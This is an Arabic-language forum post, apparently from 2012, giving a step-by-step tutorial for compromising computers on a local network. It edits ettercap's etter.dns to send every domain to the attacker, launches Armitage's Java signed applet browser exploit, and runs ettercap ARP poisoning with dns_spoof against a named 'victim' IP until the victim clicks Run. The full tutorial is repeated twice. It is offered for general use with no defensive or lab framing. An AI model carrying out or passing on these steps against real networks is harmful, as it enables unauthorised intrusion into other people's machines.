rss
08-31-2012, 09:30 AM
http://www7.0zz0.com/2012/08/31/04/849918791.gif
ان شا الله الجميع بخير
شرح اليوم اختراق ويندوز
xp/7/vista/LINUX/MAC OS
طبعا الاختراق داخليه وليس خارجي راح نستعمل ثغرة الجافا
http://www7.0zz0.com/2012/08/31/05/494397756.jpg
كيف يتم الاختراق بعد تجهيز الثغرة راح نعمل سبوف على الضحية
الذي نريد اختراقو عندما يفتح اي موقع على المتصفحة سيتم استدعاء الجافا
وسيتم اختراقهو طيب نشوف الشرح وراح نفهم
نبدء على بركة الله
اول افتح التيرمنال وادخل الامر التالي
كود:
ifconfig
خذ الايبي الخاص بك copy
http://www7.0zz0.com/2012/08/31/05/972153656.jpg
ثم افتح التيرمنال من جديد ضع الامر التالي لنعدل
كود:
gedit /usr/local/share/ettercap/etter.dns
ثم انزل الى الاسفل وضع الايبي الخاص بك ونعمل حفظ كما هوه موضح بالصوره
A 192.168.1.XXX *
http://www7.0zz0.com/2012/08/31/05/934081926.jpg
ثم نذهب ونفتح الارمتيج ARMITAGE
http://www7.0zz0.com/2012/08/31/05/564765917.jpg
http://www7.0zz0.com/2012/08/31/05/747595263.jpg
بعد ان فتحنا الارميتاج نذهب الى exploit
http://www7.0zz0.com/2012/08/31/05/885533994.jpg
ثم الى MULTI كما هوه موضح بالصوره
http://www7.0zz0.com/2012/08/31/05/992094287.jpg
ثم الى BROWSER
http://www7.0zz0.com/2012/08/31/05/209738837.jpg
ثم نختار الثغرة java signed applet
http://www7.0zz0.com/2012/08/31/05/476696683.jpg
هنا ستفتح لك نافذة ونعمل الاتصال على 80 بدل 8080
http://www7.0zz0.com/2012/08/31/05/319656386.jpg
وهنا في خانة URIPATH نضع /
http://www7.0zz0.com/2012/08/31/05/721074309.jpg
ثم اضغط launch لتشتغل الثغرة
http://www7.0zz0.com/2012/08/31/05/401673377.jpg
تمام الى هنا نرجع نفتح التيرمنال عشان نعمل dns_spoof على الضحية المراد اختراقهو
نضع الامر التالي
كود:
ettercap -T -i eth0 -q -M arp:remote /192.168.1.105/ /192.168.1.106/ -P dns_spoof
http://www7.0zz0.com/2012/08/31/05/878191418.jpg
ثم نضغط enter
تمام هيك كل شيئ جاهز لاحظ عندما يدخل الضحية الى اي متصفحة سيظهر نافذة الجافا
عند الضحية ينقر على run سيتم اختراقهو:)
http://www7.0zz0.com/2012/08/31/06/180675998.jpg
بعد ان ضغط الضحية على run ارجع الى الارميتاج وستلاحظ ان تم اختراقهو
http://www7.0zz0.com/2012/08/31/06/730249987.jpg
انتهينا ارجو ان اكون وفقت بالشرح
والله الواحد بشرح عشان الكل يستفيد لا اكثر
لا نريد الى كلمة شكر ( تحياتي )
ان شا الله الجميع بخير
شرح اليوم اختراق ويندوز
xp/7/vista/LINUX/MAC OS
طبعا الاختراق داخليه وليس خارجي راح نستعمل ثغرة الجافا
http://www7.0zz0.com/2012/08/31/05/494397756.jpg
كيف يتم الاختراق بعد تجهيز الثغرة راح نعمل سبوف على الضحية
الذي نريد اختراقو عندما يفتح اي موقع على المتصفحة سيتم استدعاء الجافا
وسيتم اختراقهو طيب نشوف الشرح وراح نفهم
نبدء على بركة الله
اول افتح التيرمنال وادخل الامر التالي
كود:
ifconfig
خذ الايبي الخاص بك copy
http://www7.0zz0.com/2012/08/31/05/972153656.jpg
ثم افتح التيرمنال من جديد ضع الامر التالي لنعدل
كود:
gedit /usr/local/share/ettercap/etter.dns
ثم انزل الى الاسفل وضع الايبي الخاص بك ونعمل حفظ كما هوه موضح بالصوره
A 192.168.1.XXX *
http://www7.0zz0.com/2012/08/31/05/934081926.jpg
ثم نذهب ونفتح الارمتيج ARMITAGE
http://www7.0zz0.com/2012/08/31/05/564765917.jpg
http://www7.0zz0.com/2012/08/31/05/747595263.jpg
بعد ان فتحنا الارميتاج نذهب الى exploit
http://www7.0zz0.com/2012/08/31/05/885533994.jpg
ثم الى MULTI كما هوه موضح بالصوره
http://www7.0zz0.com/2012/08/31/05/992094287.jpg
ثم الى BROWSER
http://www7.0zz0.com/2012/08/31/05/209738837.jpg
ثم نختار الثغرة java signed applet
http://www7.0zz0.com/2012/08/31/05/476696683.jpg
هنا ستفتح لك نافذة ونعمل الاتصال على 80 بدل 8080
http://www7.0zz0.com/2012/08/31/05/319656386.jpg
وهنا في خانة URIPATH نضع /
http://www7.0zz0.com/2012/08/31/05/721074309.jpg
ثم اضغط launch لتشتغل الثغرة
http://www7.0zz0.com/2012/08/31/05/401673377.jpg
تمام الى هنا نرجع نفتح التيرمنال عشان نعمل dns_spoof على الضحية المراد اختراقهو
نضع الامر التالي
كود:
ettercap -T -i eth0 -q -M arp:remote /192.168.1.105/ /192.168.1.106/ -P dns_spoof
http://www7.0zz0.com/2012/08/31/05/878191418.jpg
ثم نضغط enter
تمام هيك كل شيئ جاهز لاحظ عندما يدخل الضحية الى اي متصفحة سيظهر نافذة الجافا
عند الضحية ينقر على run سيتم اختراقهو:)
http://www7.0zz0.com/2012/08/31/06/180675998.jpg
بعد ان ضغط الضحية على run ارجع الى الارميتاج وستلاحظ ان تم اختراقهو
http://www7.0zz0.com/2012/08/31/06/730249987.jpg
انتهينا ارجو ان اكون وفقت بالشرح
والله الواحد بشرح عشان الكل يستفيد لا اكثر
لا نريد الى كلمة شكر ( تحياتي )